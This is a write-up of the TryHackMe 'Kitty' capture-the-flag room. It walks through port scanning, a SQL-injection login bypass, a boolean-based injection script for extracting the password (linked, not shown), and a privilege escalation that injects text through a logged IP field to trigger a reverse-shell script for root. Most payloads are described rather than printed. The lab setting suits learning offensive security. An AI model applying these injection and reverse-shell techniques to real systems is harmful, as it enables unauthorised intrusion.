Kitty
Hello everyone! Today, I'm going to tackle the CTF challenge on the TryHackMe website called "Kitty" created by Hadrian3689, so let's get to work! :)
Enumeration
NMAP SCAN
sudo nmap -p- -sS 10.10.246.78As usual, I start by finding open ports to perform the next scan with scripts on these ports to save time.
Ports 22 and 80 were found.
GOBUSTER
Considering that there is an HTTP server on the host, I will run a gobuster scan in the background while focusing on actively browsing the website.
However, gobuster didn't find anything interesting.
WEB APP
There isn't much on the website; the only options are to log in or create a new account. However, after logging in to a new account, we are greeted with a message that the site is still under construction.
Let's see what we can find on the website using Burp Suite.
I also attempted a simple SQL injection test, but the form filters text, so I think we can take a closer look at it.
Vuln Found - SQLI
When trying to enter the username "kitty" (the task mentioned it's about a kitty website, so I decided to try :)), it allows bypassing the password and accessing this account. However, there's nothing on it. Let's try to find the password for "kitty" and maybe it will allow us to log in to SSH.
NOTE: SQLmap won't work here; the website has some filtering that prevents dumping the entire database, but the filter is poorly implemented, allowing password bypass.
Exploitation
Retrieving database name from boolean sqli
So, the plan is to know the name of the database. However, manual attempts will be terribly time-consuming, so I decided to practice scripting. After some time spent trying different payloads, this one worked:
Automated script
You can also find it [here on GitHub].
In the further part, we will proceed deeper.
Table enumeration
Password enumeration
We already know the username "kitty," so let's go straight to the password.
So, we have everything; let's see if we can use it to access SSH.
And that's how I got the user flag B)
PrivEsc
To start privsec, I always use the linpeas tool first, available HERE. After uploading it to the machine in the /tmp folder, changing its properties using the chmod +x command, and running the script.
As seen on the host, there's another page available, this time on port 8080, but we can't use it from our machine. However, we can create an SSH tunnel that forwards all packets to port 8081 to 8080, allowing direct access from the browser B)
I saw the above page, but I don't know the passwords. Instead, I noticed that linpeas found passwords hidden in some php configuration file - a good sign.
I decided to log into the local database using these passwords, and it worked.
We see another database worth searching.
We find the same passwords as on the first page.
hmmβ¦
The website itself turns out to be exactly the same - but is it really?
I decided to check using the diff command.
NOTE FROM AUTHOR: Sorry the screenshot was lost in the process of writing this. Thanks for understandingπ
It appears that the script fetches the IP from the user who performs the SQLi and then it is saved in the location var/www/development/logged as seen in the previous script. Let's see if we can use this for our purposes.
Let's try something like this: instead of an IP, we will use any text, and it should be saved in the development/logged file, as we saw in the previous script. Everything is prefixed with activating the SQLi filter.
If it works, let's check if we can get a reverse shell here.
I created a simple bash script in the /tmp folder named revshell.sh.
The script worked, giving us a root shellππ©
Last updated